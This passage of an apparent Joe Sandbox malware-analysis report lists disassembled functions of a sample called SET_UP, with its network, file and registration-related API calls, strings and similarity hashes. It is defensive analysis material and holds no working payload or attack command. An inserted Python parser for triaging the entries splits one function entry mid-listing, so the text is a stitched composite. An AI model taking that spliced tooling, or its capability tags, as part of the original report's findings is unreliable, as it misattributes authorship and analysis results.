                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CaptureKillTimer$Release
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1776425836-0
                                                                                                                                                                                                  • Opcode ID: 383c1beb03c4f396697f1325fc66989deec7d1b5cfda1fd863b04f5527efe888
                                                                                                                                                                                                  • Instruction ID: ff70a55012874fdc0146c3e6bf6df41a332ff5847c315a7c8601179493dbd5c9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 383c1beb03c4f396697f1325fc66989deec7d1b5cfda1fd863b04f5527efe888
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0B4723007419BDB312B71DC40BDBB3A5EF40715F100C1AF247A6050C77DA8118778
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004915E4
                                                                                                                                                                                                    • Part of subcall function 00491DDA: __EH_prolog.LIBCMT ref: 00491DDF
                                                                                                                                                                                                    • Part of subcall function 00492D95: __EH_prolog.LIBCMT ref: 00492D9A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog
• String ID: Exceeded stackLimit in readValue().$Syntax error: value, object or array expected.
• API String ID: 3519838083-359489996
• Opcode ID: 7af6a54394ec40180cd9c8ff5db56878dfeee701f56978469e2c0eb50cdf0ec0
• Instruction ID: cfa801ed9e9a2a7af0d91a73a2cc1985bfa47304c53fdb1a4e4b2a87808730bb
• Opcode Fuzzy Hash: 7af6a54394ec40180cd9c8ff5db56878dfeee701f56978469e2c0eb50cdf0ec0
• Instruction Fuzzy Hash: 6891B474E00605ABCF14FBF5C5998AEBBF8AF44304B10483FF55697291DE38AA05DB68
APIs
• __EH_prolog.LIBCMT ref: 0041DB12
• WinHttpReadData.WINHTTP(?,?,?,?,00001000), ref: 0041DBB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: DataH_prologHttpRead
• String ID: 1M
• API String ID: 3278886430-704753155
• Opcode ID: 8b44370b316587bddc6ce752584c596cc0f630617f642b86ec4bd9a91d2570d0
• Instruction ID: a6e999ba8dcf3b842485c55ff5508cf372f46ddb3b56b4afa9eaa97f6adf53fc
• Opcode Fuzzy Hash: 8b44370b316587bddc6ce752584c596cc0f630617f642b86ec4bd9a91d2570d0
• Instruction Fuzzy Hash: D9512EB1D00619EFCF21CF99C8848EFFBB5FF58714B24451BE512A6260D7B99980CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Info
• String ID: $
• API String ID: 1807457897-3032137957
• Opcode ID: 6685bd5710caf47db36117d3f6ba3b2ca0cdf46385baf7359c3e8aba6eb0113c
• Instruction ID: b2a6834eef21ee8141538aec8bea9a30235e94c86c02e6cafd58c561184704ef
• Opcode Fuzzy Hash: 6685bd5710caf47db36117d3f6ba3b2ca0cdf46385baf7359c3e8aba6eb0113c
• Instruction Fuzzy Hash: DA418B310081991AFF119754CCDABFB7FA8AB27744F1404E6D58AC7193C7694D08DBAA
APIs
• __EH_prolog.LIBCMT ref: 00438836
  • Part of subcall function 0041F220: __EH_prolog.LIBCMT ref: 0041F225
  • Part of subcall function 0041F220: GetTempPathW.KERNEL32(000003FF,00000000), ref: 0041F25B
  • Part of subcall function 0041C4D3: __EH_prolog.LIBCMT ref: 0041C4D8
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
  • Part of subcall function 00438388: __EH_prolog.LIBCMT ref: 0043838D
• PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 004388B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog$Path$DecrementExistsFileInterlockedTemp
• String ID: PXM
• API String ID: 2388260370-3924958675
• Opcode ID: 38260a97ff57835865193b216624458ae60894bd0ba5f705e4fe511154e020b0
• Instruction ID: 6354a4a2cba8268f72c7872ae19cb3955391a778b45f9bead18b20ad310a4968
• Opcode Fuzzy Hash: 38260a97ff57835865193b216624458ae60894bd0ba5f705e4fe511154e020b0
• Instruction Fuzzy Hash: 1341AC31801258EECF21EFA1CD4ABEDBB74AF18348F10419EF40562291EB794B58DF69
APIs
• __EH_prolog.LIBCMT ref: 0042DC4C
  • Part of subcall function 0042D435: __EH_prolog.LIBCMT ref: 0042D43A
  • Part of subcall function 0042D435: CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 0042D4A0
  • Part of subcall function 0042D4D6: CloseHandle.KERNEL32(?), ref: 0042D4E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog$CloseCreateFileHandle
• String ID: $>M$1M
• API String ID: 1152210893-4237397193
• Opcode ID: 92905e79abaac3b4bb3be02fdf0ef01d5a5c0a7b11602f1022fbfdc39464bd62
• Instruction ID: 0e57b2efdec3bdeeede20f454fb2bc40b0482048d2be2785a267b0e4cee3268f
• Opcode Fuzzy Hash: 92905e79abaac3b4bb3be02fdf0ef01d5a5c0a7b11602f1022fbfdc39464bd62
• Instruction Fuzzy Hash: 30414BB0E00219ABDF15DFAAD590AEDFBB4AF14304F60806FE411A3281DB785A45CF59
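The function entries in this listing follow one fixed layout (an APIs list with optional "Part of subcall function" lines, then Strings, Memory Dump Source, Joe Sandbox IDA Plugin and Similarity blocks of "Key: value" bullets). When a report has hundreds of such entries, the practical step is to parse them into records so the functions that touch the network or the file system can be pulled out and their Instruction Fuzzy Hash and API String ID values reused for matching against other samples. The parser below is an added example and is not part of the Joe Sandbox report, its tooling, or the analysed sample; the sample input is constructed from two entries copied from this listing (the WinHttpReadData function and the GetTempPathW/PathFileExistsW function), and the record names, the capability table and the tag labels are my own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample input: two function entries copied from this report's
# listing. Only the lines the parser consumes are reproduced here.
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 0041DB12
• WinHttpReadData.WINHTTP(?,?,?,?,00001000), ref: 0041DBB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: DataH_prologHttpRead
• String ID: 1M
• API String ID: 3278886430-704753155
• Opcode ID: 8b44370b316587bddc6ce752584c596cc0f630617f642b86ec4bd9a91d2570d0
• Instruction Fuzzy Hash: D9512EB1D00619EFCF21CF99C8848EFFBB5FF58714B24451BE512A6260D7B99980CBA4
APIs
• __EH_prolog.LIBCMT ref: 00438836
  • Part of subcall function 0041F220: GetTempPathW.KERNEL32(000003FF,00000000), ref: 0041F25B
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
• PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 004388B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog$Path$DecrementExistsFileInterlockedTemp
• String ID: PXM
• API String ID: 2388260370-3924958675
• Opcode ID: 38260a97ff57835865193b216624458ae60894bd0ba5f705e4fe511154e020b0
• Instruction Fuzzy Hash: 1341AC31801258EECF21EFA1CD4ABEDBB74AF18348F10419EF40562291EB794B58DF69
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
# One "Key: value" bullet in the non-API blocks
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                           # address of the call site
    subcall_of: Optional[int] = None   # callee address when reached through a subcall


@dataclass
class FunctionEntry:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def api_string_id(self) -> str:
        return self.fields.get("API String ID", "")

    @property
    def instruction_fuzzy_hash(self) -> str:
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the listing at each 'APIs' header and parse one entry per function."""
    entries: List[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                 # every function entry starts here
            entries.append(FunctionEntry())
            section = "apis"
            continue
        if not line.startswith("•"):       # any other bare line is a block header
            section = line
            continue
        if not entries:
            continue
        if section == "apis":
            m = API_RE.match(raw)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                entries[-1].apis.append(ApiCall(
                    m["name"], m["module"], args, int(m["ref"], 16),
                    int(m["sub"], 16) if m["sub"] else None))
        else:
            m = KV_RE.match(raw)
            if m:
                entries[-1].fields[m["key"].strip()] = m["value"].strip()
    return entries


# Assumed capability tags keyed on API names seen in this listing (my mapping).
CAPABILITIES = {
    "network": {"WinHttpReadData"},
    "filesystem": {"CreateFileW", "PathFileExistsW", "GetTempPathW", "PathFindExtensionW"},
}


def triage(entry: FunctionEntry, include_subcalls: bool = True) -> set:
    """Return the capability tags for an entry; subcall APIs are optional."""
    tags = set()
    for call in entry.apis:
        if call.subcall_of is not None and not include_subcalls:
            continue
        for tag, names in CAPABILITIES.items():
            if call.name in names:
                tags.add(tag)
    return tags


def fuzzy_hash_index(entries: List[FunctionEntry]) -> Dict[str, List[str]]:
    """Map each Instruction Fuzzy Hash to the sorted API names of its function."""
    return {e.instruction_fuzzy_hash: sorted({c.name for c in e.apis})
            for e in entries if e.instruction_fuzzy_hash}


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e.api_string_id, sorted(triage(e)), [c.name for c in e.apis])
```

The `include_subcalls` switch matters when reading these entries: the report attributes GetTempPathW to the PathFileExistsW function only through a subcall at 0041F220, so a direct-call-only view would show that function as a path check rather than a temp-directory probe. The index keyed on Instruction Fuzzy Hash is what you would diff against another sample's report to see which functions are shared.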
APIs
• __EH_prolog.LIBCMT ref: 0043424A
• PathFindExtensionW.SHLWAPI(?,?,?,?,00000000), ref: 0043426D
  • Part of subcall function 004B1F9A: lstrlenW.KERNEL32(00000000,00000000,?,?,004C4ED0,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004B1FC4
  • Part of subcall function 00434387: __EH_prolog.LIBCMT ref: 0043438C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog$ExtensionFindPathlstrlen
• String ID: .playlist
• API String ID: 1411584661-513442779
• Opcode ID: 635b9e36a317942322340f6ddc0930168f13c6d9da94c5b2c57f2627481d48f6
                                                                                                                                                                                                  • Instruction ID: d2a69bf3ffed2eea84caf7ef5a1810d74a78c6ac9be7616a86f98f504502e992
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 635b9e36a317942322340f6ddc0930168f13c6d9da94c5b2c57f2627481d48f6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF418F70A00205EFCB14EFA5C955BEDBB70AF14358F10426EF825672E1DB785E44CB55
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog
• String ID: ()[]\;:,<>$~!@#$%^&*()_=+\|[]{};:'",<>/?
• API String ID: 3519838083-2959575185
• Opcode ID: c2dad79a87278e4d46c91f2da2ab8bcc42dc11ea72a55fe1eda9b2ddc4f8c711
• Instruction ID: 898933c0e5790896d28195a1d2ac55a8b0e229f416b80912efe200b89fb99118
• Opcode Fuzzy Hash: c2dad79a87278e4d46c91f2da2ab8bcc42dc11ea72a55fe1eda9b2ddc4f8c711
• Instruction Fuzzy Hash: EB31E6316101249BCF25EFA1DD86BFEB730EB14354F50411AF819671D1CBB85E84C6AD
APIs
• __EH_prolog.LIBCMT ref: 0041DD1E
  • Part of subcall function 004B20BD: lstrlenW.KERNEL32(00000000,?,?,004B1CC0,?,?,00403D3C,00000000,?,?,00403D1B,?,?,?,?,00403D01), ref: 004B20CE
  • Part of subcall function 004AF449: __EH_prolog.LIBCMT ref: 004AF44E
  • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
• WinHttpCrackUrl.WINHTTP(?), ref: 0041DDDE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog$CrackDecrementHttpInterlockedlstrlen
• String ID: <
• API String ID: 665966979-4251816714
• Opcode ID: bdd526c21f4952b85838583bbd9279a05e7652fcced5d2a9fd07a7a45c709d86
• Instruction ID: 676e48099b8ddfda0302c449c0fcf29faa2d6c0ddb2cd1673c33d617bafb6090
• Opcode Fuzzy Hash: bdd526c21f4952b85838583bbd9279a05e7652fcced5d2a9fd07a7a45c709d86
• Instruction Fuzzy Hash: DB3162B1901209EFCB10EFA5D8859DEBB78FF14354F10812FF925A7291DB389A44CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: H_prolog
• String ID: $```
• API String ID: 3519838083-3681826150
• Opcode ID: 1653d858755140f7251e6d65577b66ee253ac18408065aa351f1eeec9fe643dc
• Instruction ID: 0f3c25c9745e8274ab7d54f4c3ac35761cbfedea2c49ad7c46c9168909447a9b
• Opcode Fuzzy Hash: 1653d858755140f7251e6d65577b66ee253ac18408065aa351f1eeec9fe643dc
• Instruction Fuzzy Hash: D63190B1D00619CECF85DF69848069ABBF5FF49704F00416AED09EF246E3B59609CFA4
APIs
• GetClientRect.USER32(?,?), ref: 00404681
  • Part of subcall function 004C048E: SetBkColor.GDI32(?,?), ref: 004C049D
  • Part of subcall function 004C048E: ExtTextOutW.GDI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004C04CF
• CopyRect.USER32(?,?), ref: 004046D9
  • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B9471
  • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B947F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: ModeRect$ClientColorCopyText
• String ID:
• API String ID: 2917079683-1776720792
• Opcode ID: 7ef3bbe2bc36061bb16bd8594df6e38ad7beda7422e316708abf2d4c2916176b
• Instruction ID: c0bd325eb9edaa693153bb9bdbf36e52ddd8769a984a2f96b2a22607ae3d5344
• Opcode Fuzzy Hash: 7ef3bbe2bc36061bb16bd8594df6e38ad7beda7422e316708abf2d4c2916176b
• Instruction Fuzzy Hash: 93314B71600109AFCB15DFA9C988EAEBBB9FF48700F100159FA45E7291CB35AE41CFA5
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042D367
                                                                                                                                                                                                    • Part of subcall function 004B4AB4: __EH_prolog.LIBCMT ref: 004B4AB9
                                                                                                                                                                                                    • Part of subcall function 0042AC4D: __EH_prolog.LIBCMT ref: 0042AC52
                                                                                                                                                                                                    • Part of subcall function 0041F3AE: __EH_prolog.LIBCMT ref: 0041F3B3
                                                                                                                                                                                                    • Part of subcall function 0042ACDA: __EH_prolog.LIBCMT ref: 0042ACDF
                                                                                                                                                                                                    • Part of subcall function 004B1C93: InterlockedIncrement.KERNEL32(-000000F4), ref: 004B1CA8
                                                                                                                                                                                                    • Part of subcall function 0041E716: __EH_prolog.LIBCMT ref: 0041E71B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Registered successfully!, xrefs: 0042D3C1
                                                                                                                                                                                                  • Failed to register: invalid user ID or license key!Please check your user ID and license key, then try again., xrefs: 0042D40D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                   • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$IncrementInterlocked
                                                                                                                                                                                                  • String ID: Failed to register: invalid user ID or license key!Please check your user ID and license key, then try again.$Registered successfully!
                                                                                                                                                                                                  • API String ID: 2670639370-3175152671
                                                                                                                                                                                                  • Opcode ID: 840aa2bf2c92763592c035d47cd8258ff0e33ebe4d70f1431a829f16ff26985e
                                                                                                                                                                                                  • Instruction ID: 0b05744ef955be8f69d6b43fd836cb314d9f16fc65714dfa3ac647eaeea0a293
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 840aa2bf2c92763592c035d47cd8258ff0e33ebe4d70f1431a829f16ff26985e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45219571E00218AFDB14FBA5D882EEEB778EB44358F10411FF411A3281DA785E45867D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042D0F8
                                                                                                                                                                                                    • Part of subcall function 00429795: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00509260,00000000,00000000,?,?,00000000,00421420,?), ref: 004297D4
                                                                                                                                                                                                    • Part of subcall function 00429795: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00429806
                                                                                                                                                                                                    • Part of subcall function 004B20E4: lstrlenA.KERNEL32(0040DAC6,?,?,00000104,0040DAC6,00000000), ref: 004B20F2
                                                                                                                                                                                                  Strings
